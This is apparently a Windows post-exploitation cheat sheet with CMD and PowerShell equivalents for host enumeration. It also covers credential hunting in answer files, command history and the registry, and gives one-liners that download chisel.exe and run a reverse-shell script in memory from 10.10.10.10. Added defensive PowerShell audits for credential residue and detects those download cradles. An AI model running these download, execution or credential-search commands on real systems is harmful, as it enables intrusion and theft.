To understand how PowerShell works and how its commands are formed, check out
Commands used in post-exploitation, with CMD and PowerShell variants
C: command for cmd
P: command for PowerShell
C: systeminfo
P: Get-ComputerInfo
C: findstr
P: Select-String -Pattern "OS:"
Piping with | works the same in both
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"
C: whoami [or] echo %username%
P: $env:UserName
C: hostname
P: $env:COMPUTERNAME [or] $env:USERDOMAIN (the domain the logged-on user belongs to)
C: net user [or] net user /domain
P: Get-LocalUser
Information about the user
C: net user dnoscp
P: Get-LocalUser dnoscp
C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup
C: net localgroup Administrators
P: Get-LocalGroupMember Administrators
C: ipconfig [or] ipconfig /all
P: Get-NetAdapter
Routing table information
C: route print
P: Get-NetRoute
C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection
C: schtasks
P: Get-ScheduledTask
C: tasklist /svc
P: Get-Process
C: net start Themes
P: Start-Service Themes (Start-Process -FilePath "sort.exe" launches an executable, not a service)
C: driverquery
P: Get-WindowsDriver -Online -All
C: wmic qfe get Caption, Description, InstalledOn, HotFixID
P: (New-Object -ComObject "Microsoft.Update.AutoUpdate").Results | fl
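The CMD column prints text; the PowerShell column returns objects, which is what makes the enumeration composable. The following function is an added example (not from the original page) that combines the PowerShell cmdlets listed above into one snapshot object that can be inspected, exported and diffed against a later run. It assumes Windows PowerShell 5.1 or later with the LocalAccounts, NetTCPIP and ScheduledTasks modules present (standard on Windows 10 / Server 2016 and later); the function and parameter names are my own.

```powershell
# Added example: one-shot host snapshot built from the cmdlets in the table above.
# Assumes Windows PowerShell 5.1+ on a host where Get-LocalGroupMember,
# Get-NetTCPConnection and Get-ScheduledTask are available.
function Get-HostSnapshot {
    [CmdletBinding()]
    param(
        # Local group whose membership is reported (default is the one from the table)
        [string]$PrivilegedGroup = 'Administrators'
    )

    # Get-ComputerInfo equivalent of systeminfo, trimmed to the fields usually needed
    $info = Get-ComputerInfo -Property CsName, OsName, OsVersion, OsArchitecture, CsDomain

    # net localgroup Administrators equivalent, as objects
    $admins = Get-LocalGroupMember -Name $PrivilegedGroup -ErrorAction SilentlyContinue |
        Select-Object Name, ObjectClass, PrincipalSource

    # netstat -ano equivalent: listening TCP sockets joined to the owning process name
    $listeners = Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                LocalAddress = $_.LocalAddress
                LocalPort    = $_.LocalPort
                Pid          = $_.OwningProcess
                Process      = if ($proc) { $proc.ProcessName } else { $null }
            }
        }

    # schtasks equivalent, filtered to tasks outside the \Microsoft\ tree
    # (those are the ones an administrator, or an intruder, created)
    $tasks = Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { $_.TaskPath -notlike '\Microsoft\*' -and $_.State -ne 'Disabled' } |
        Select-Object TaskName, TaskPath, State,
            @{ n = 'Command'; e = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' } }

    # sc query equivalent, running services only
    $services = Get-Service | Where-Object Status -eq 'Running' | Select-Object Name, DisplayName

    # wmic qfe equivalent: Get-HotFix returns the same data as objects
    $hotfixes = Get-HotFix -ErrorAction SilentlyContinue |
        Sort-Object InstalledOn -Descending |
        Select-Object -First 10 HotFixID, Description, InstalledOn

    [pscustomobject]@{
        Host            = $info
        PrivilegedUsers = $admins
        Listeners       = $listeners
        CustomTasks     = $tasks
        RunningServices = $services
        RecentHotfixes  = $hotfixes
        CollectedAt     = (Get-Date).ToUniversalTime()
    }
}

# Usage:
#   $snap = Get-HostSnapshot
#   $snap.Listeners | Format-Table -AutoSize
#   $snap | ConvertTo-Json -Depth 4 | Set-Content host-snapshot.json   # keep for later comparison
```

Because each field is an object collection, a defender can run the same function on a known-good build and compare the JSON output with `Compare-Object` to spot a new listener, a new local admin or a new non-Microsoft scheduled task.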
Files that commonly contain stored credentials (setup answer files and the PowerShell command history)
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
C: dir /s /p *.txt *.xml
P: Get-ChildItem -Path . -Include *.txt,*.xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'
Search for a string in a file
C: findstr /si "password" *.txt *.xml
P: Get-ChildItem -Recurse . -Include *.txt,*.xml | Select-String "password"
Search the registry for passwords
reg query HKLM /f "password" /t REG_SZ /s
reg query HKCU /f "password" /t REG_SZ /s
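The answer-file paths, the PSReadline history, the file search and the registry search above are the usual places where credentials are left behind on a host. The function below is an added example (not from the original page) that audits all four in one pass and returns a list of findings with the secret itself masked, so it can be run by an administrator checking a build for credential residue. Function and parameter names are my own; it assumes PowerShell 5.1 or later on Windows.

```powershell
# Added example: audit a host for the credential residue listed above.
# Assumes Windows PowerShell 5.1+; all names below are constructed for this example.
function Find-CredentialResidue {
    [CmdletBinding()]
    param(
        [string]$SearchRoot = 'C:\Users',                                 # profiles and loose files
        [string[]]$RegistryRoots = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'), # hives to walk
        [string]$Pattern = 'password'                                     # literal string to look for
    )

    $findings = New-Object System.Collections.Generic.List[object]
    # Everything after the keyword is masked so the report does not itself leak the secret
    $maskRegex = "(?i)($([regex]::Escape($Pattern))|-AsPlainText|ConvertTo-SecureString).*"

    # 1. Setup answer files that may hold plaintext or base64 local-admin passwords
    $answerFiles = @(
        'C:\sysprep.inf',
        'C:\sysprep\sysprep.xml',
        "$env:WINDIR\Panther\Unattend\Unattended.xml",
        "$env:WINDIR\Panther\Unattended.xml"
    )
    foreach ($f in $answerFiles) {
        if (Test-Path -LiteralPath $f) {
            $findings.Add([pscustomobject]@{ Kind = 'AnswerFile'; Location = $f; Detail = 'file present' })
        }
    }

    # 2. PSReadline history of every profile under the search root
    Get-ChildItem -Path $SearchRoot -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $hist = Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt'
        if (Test-Path -LiteralPath $hist) {
            Select-String -LiteralPath $hist -Pattern $Pattern, 'ConvertTo-SecureString', '-AsPlainText' -SimpleMatch |
                ForEach-Object {
                    $findings.Add([pscustomobject]@{
                        Kind = 'History'; Location = "$hist`:$($_.LineNumber)"
                        Detail = ($_.Line.Trim() -replace $maskRegex, '$1 [masked]')
                    })
                }
        }
    }

    # 3. Text and XML files mentioning the pattern (the Get-ChildItem | Select-String pair above)
    Get-ChildItem -Path $SearchRoot -Include *.txt, *.xml -Recurse -File -Force -ErrorAction SilentlyContinue |
        Select-String -Pattern $Pattern -SimpleMatch -List -ErrorAction SilentlyContinue |
        ForEach-Object {
            $findings.Add([pscustomobject]@{
                Kind = 'File'; Location = "$($_.Path):$($_.LineNumber)"
                Detail = ($_.Line.Trim() -replace $maskRegex, '$1 [masked]')
            })
        }

    # 4. REG_SZ values whose name or data contains the pattern (reg query /f /t REG_SZ /s equivalent)
    foreach ($root in $RegistryRoots) {
        Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                if ($key.GetValueKind($name) -ne 'String') { continue }
                $data = [string]$key.GetValue($name)
                if ($name -like "*$Pattern*" -or $data -like "*$Pattern*") {
                    $findings.Add([pscustomobject]@{
                        Kind = 'Registry'; Location = "$($key.Name)\$name"
                        Detail = "value data masked ($($data.Length) chars)"
                    })
                }
            }
        }
    }

    return $findings
}

# Usage: Find-CredentialResidue | Format-Table -AutoSize
#        Find-CredentialResidue -SearchRoot 'D:\Deploy' -Pattern 'AdministratorPassword'
```

The registry walk is the slow part; narrow `-RegistryRoots` to the application subkeys of interest when running it on a large fleet.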
C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}
Information about a specific service
C: sc query "Spooler"
P: Get-Service "Spooler"
C: copy source_location destination
P: Copy-Item source_location -Destination destination
C: move source_location destination
P: Move-Item source_location -Destination destination
C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/chisel.exe", "chisel.exe")
Execute PowerShell scripts directly from memory (no file is written to disk)
P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)
# Can be aliased as
iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)
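The download and in-memory execution one-liners above are also the commands a defender most wants to see in telemetry: they appear verbatim in the PSReadline history file listed earlier and in the ScriptBlockText field of event 4104 (Microsoft-Windows-PowerShell/Operational) when script block logging is on. The following is an added example (not from the original page) of detection logic for those patterns, run here over constructed sample lines; the pattern names and the function name are my own.

```powershell
# Added example: flag the download-and-execute patterns listed above in command-history
# or script-block-log text. Patterns and sample lines are constructed for this example.
$CradlePatterns = @(
    @{ Name = 'IEX over web request'; Regex = '(?i)\b(iex|invoke-expression)\b.*\b(iwr|invoke-webrequest|irm|invoke-restmethod)\b' }
    @{ Name = 'WebClient download';   Regex = '(?i)net\.webclient.*\.download(file|string)\(' }
    @{ Name = 'certutil urlcache';    Regex = '(?i)\bcertutil(\.exe)?\b.*-urlcache' }
    @{ Name = 'Web request to disk';  Regex = '(?i)\b(iwr|invoke-webrequest)\b.*-outfile' }
)

function Find-DownloadCradle {
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)][string]$Line)
    process {
        foreach ($p in $CradlePatterns) {
            if ($Line -match $p.Regex) {
                # One finding per matching pattern, so a line can surface more than once
                [pscustomobject]@{ Pattern = $p.Name; Line = $Line }
            }
        }
    }
}

# Constructed sample: two ordinary commands and the four download/execute forms from this page.
# Replace with Get-Content on ConsoleHost_history.txt or the ScriptBlockText of 4104 events.
$sample = @(
    'Get-ChildItem -Recurse . -Include *.txt | Select-String "password"',
    'Get-NetTCPConnection -State Listen',
    'iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)',
    '(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/chisel.exe", "chisel.exe")',
    'certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe',
    'Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe'
)
$sample | Find-DownloadCradle | Format-Table -AutoSize

# Reading live script block logs instead of the constructed sample:
#   Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath '*[System[EventID=4104]]' |
#       ForEach-Object { $_.Properties[2].Value } | Find-DownloadCradle
```

The 'Web request to disk' pattern will also match legitimate administrative downloads, so treat it as an enrichment signal and alert on the other three; the aliases (iex, iwr, irm) are matched explicitly because the short forms are what usually shows up in practice.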